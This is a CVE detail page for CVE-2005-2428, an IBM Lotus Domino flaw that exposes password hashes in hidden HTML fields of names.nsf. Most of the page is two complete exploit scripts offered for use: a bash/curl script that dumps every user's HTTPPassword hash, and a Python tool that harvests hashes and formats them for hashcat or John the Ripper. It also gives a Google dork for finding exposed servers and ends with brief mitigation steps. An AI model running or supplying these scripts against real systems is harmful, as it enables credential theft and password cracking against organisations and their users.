CVE-2005-2428 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/bin/bash # # $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $ # # raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump # Copyright (c) 2007 Marco Ivaldi <[email protected]> # # Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, # stores sensitive data from names.nsf in hidden form fields, which allows # remote attackers to read the HTML source to obtain sensitive information such # as (1) the password hash in the HTTPPassword field, (2) the password change # date in the HTTPPasswordChangeDate field, (3) the client platform in the # ClntPltfrm field, (4) the client machine name in the ClntMachine field, and # (5) the client Lotus Domino release in the ClntBld field, a different # vulnerability than CVE-2005-2696 (CVE-2005-2428). # # According to testing, it's possible to dump all HTTPPassword hashes using the # $defaultview view instead of $users. This saves a considerable amount of time. # # The code may require some changes to properly work with your configuration. # # See also: # http://www.securiteinfo.com/outils/DominoHashBreaker.shtml # # Usage: # $ ./raptor_dominohash 192.168.0.202 # [...] # Extracting the view entries... # Done! 656 unique entries have been found. # Now ready to dump password hashes... # [...] # [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3] # FirstName: Foo # LastName: Bar # ShortName: fbar # HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4) # [...] # # Vulnerable platforms: # Lotus Domino R6 Webmail [tested] # Lotus Domino R5 Webmail [untested] # Lotus Domino R4 Webmail? [untested] # # Some vars i=1 tmp1=dominohash1.tmp tmp2=dominohash2.tmp # Command line host=$1 # Local fuctions function header() { echo "" echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump" echo "Copyright (c) 2007 Marco Ivaldi <[email protected]>" echo "" } function footer() { echo "" exit 0 } function usage() { header echo "usage : ./raptor_dominohash <host>" echo "example: ./raptor_dominohash 192.168.0.202" footer } function notfound() { header echo "error : curl not found" footer } # Check if curl is there curl=`which curl 2>/dev/null` if [ $? -ne 0 ]; then notfound fi # Input control if [ -z "$1" ]; then usage fi # Remove temporary files rm -f $tmp1 rm -f $tmp2 header # Extract the view entries echo "Extracting the view entries..." while : do curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1 # Check grep return value if [ $? -ne 0 ]; then break fi # Go for the next page i=`expr $i + 30` echo -ne "\b\b\b\b\b\b\b\b$i" done cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2 # Check if some view entries have been found if [ ! -s $tmp2 ]; then echo "No entries found on host ${host}!" footer fi echo -ne "\b\b\b\b\b\b\b\bDone! " echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found." echo "" # Perform the hash dumping echo "Now ready to dump password hashes..." echo "" sleep 4 for unid in `cat $tmp2` do echo "[http://${host}/names.nsf/\$defaultview/${unid}]" echo "" #curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"' curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">' echo "" done footer # milw0rm.com [2007-02-13]

# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit # Google Dork: inurl:names.nsf?opendatabase # Date: 02-24-2016 # Exploit Author: Jonathan Broche # Contact: https://twitter.com/g0jhonny # Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/ # Tested on: Lotus Domino 8.5 # CVE : CVE-2005-2428 1. Description IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database. 2. Proof of Concept #!/usr/bin/env python2 import requests, re, BeautifulSoup, sys, argparse, os requests.packages.urllib3.disable_warnings() parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0") parser.add_argument('system', help="IP address or hostname to harvest hashes from. ") parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]") outgroup = parser.add_argument_group(title="Output Options") outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.") outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.") if len(sys.argv) == 1: parser.print_help() sys.exit(1) args = parser.parse_args() print "\nDomino Effect {}\n".format(parser.version) headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'} try: response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3) except requests.exceptions.Timeout as e: print "[!] Timed out, try again." sys.exit(1) except Exception as e: print e soup = BeautifulSoup.BeautifulSoup(response.text) links = [] #grab all user profile links for link in soup.findAll('a'): if "OpenDocument" in link['href']: if link['href'] not in links: links.append(link['href']) hashes = {} for link in links: #get user profile try: response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2) except requests.exceptions.Timeout as e: pass except Exception as e: print e if response.text: soup = BeautifulSoup.BeautifulSoup(response.text) name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip() dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip() if httppassword and httppassword not in hashes.keys(): hashes[httppassword] = name elif dsphttppassword and dsphttppassword not in hashes.keys(): hashes[dsphttppassword] = name if hashes: #output if args.hashcat or args.john: if args.hashcat: for h in hashes.keys(): print h if args.john: for h, n in hashes.items(): print "{}:{}".format(n,h) else: for h, n in hashes.items(): print "[*] User: {} Hash: {}".format(n, h) print "\n{} hashes obtained\n".format(len(hashes)) 3. Solution To hide the HTTP password from the HTML source: 1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms). 2) Find the fields: $dspHTTPPassword and HTTPPassword. 3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers". 4) Open the Person form (Under Forms). 5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields". In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.